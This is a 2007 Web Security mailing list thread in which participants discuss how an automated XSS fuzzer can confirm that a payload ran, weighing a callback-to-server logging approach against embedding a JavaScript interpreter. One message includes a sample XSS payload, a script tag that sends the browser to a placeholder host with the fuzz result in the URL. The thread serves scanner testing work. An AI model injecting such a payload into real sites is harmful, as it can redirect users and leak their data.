
RE: [WEB SECURITY] How to detect XSS in an automated fashion



Not bad, but this isn't great either. Ignoring how you gain code
execution (<script> tag, scriptable attribute, javascript href, CSS,
etc), your "call back to a server" logging method requires the following
5 special characters: . = : / ?

While piggybacking on the browser certainly works for a quick tool, you
really need to embed a full JavaScript interpreter into your scan and be
able to control DOM events, properties, etc. Then your confirmation step
can be as simple as setting a variable!

Trust me, I've been down this road before. Go look at Mozilla's Rhino or
SpiderMonkey if the licensing works for your project.

Billy Hoffman
--
Lead Researcher, SPI Labs
SPI Dynamics, An HP Company
http://www.spidynamics.com
Phone:  678-781-4800
Direct:   678-781-4845
Attend SPICON 2.0 - SPI Dynamics' User Conference - and earn CPE
credits. 
Sign up today at http://www.spicon2007.com/.

-----Original Message-----
From: gaz_sec@xxxxxxxxxxxx [mailto:gaz_sec@xxxxxxxxxxxx] 
Sent: Wednesday, August 29, 2007 9:42 PM
To: websecurity@xxxxxxxxxxxxx; Billy Hoffman
Cc: travisaltman@xxxxxxxxx
Subject: RE: [WEB SECURITY] How to detect XSS in an automated fashion

I've thought about an XSS fuzzer a bit more now; you'll have to
excuse me, but it's 2.30am here :) Right, the best way to do it in my
opinion is:-

1. Base site contains an iframe with the target site in.
2. The base site sends XSS fuzz to the target site through
javascript location.
3. The fuzzer contains javascript code to log the results back to a
server side script. E.g.
<script>self.location='http://yoursite.com?logresults?fuzzResult=FuzzBaseEncoded'</script>


On Thu, 30 Aug 2007 01:48:29 +0100 Billy Hoffman 
<Billy.Hoffman@xxxxxxxxxxxxxxx> wrote:
>Of course, that only works if your web scanner has a JavaScript 
>interpreter!
>
>Billy
>
>-----Original Message-----
>From: gaz_sec@xxxxxxxxxxxx [mailto:gaz_sec@xxxxxxxxxxxx]
>Sent: Wed 8/29/2007 3:03 PM
>To: websecurity@xxxxxxxxxxxxx
>Cc: travisaltman@xxxxxxxxx
>Subject: Re: [WEB SECURITY] How to detect XSS in an automated fashion
> 
>Hi Travis
>
>I've written an HTML/JS fuzzer in which I encountered the same
>problem. I decided to create a simple javascript callback which
>was executed on successful fuzz. I base encoded the result and sent
>the information via a normal HTML image (really a PHP script) which
>logged the results.
>
>Cheers
>
>Gareth
>
>On Wed, 29 Aug 2007 19:22:22 +0100 Travis Altman 
><travisaltman@xxxxxxxxx> wrote:
>>I am trying to run through a dictionary of XSS attacks (aka
>>fuzzing) on a web application. What is the best way to determine, in an
>>automated fashion, if each attack was successful? Would I simply review
>>the source code of the response to see if my attack was encoded or filtered?
>>
>>http://travisaltman.com
>
>-------------------------------------------------------------------
>---------
>Join us on IRC: irc.freenode.net #webappsec
>
>Have a question? Search The Web Security Mailing List Archives: 
>http://www.webappsec.org/lists/websecurity/
>
>Subscribe via RSS: 
>http://www.webappsec.org/rss/websecurity.rss [RSS Feed]








Brought to you by http://www.webappsec.org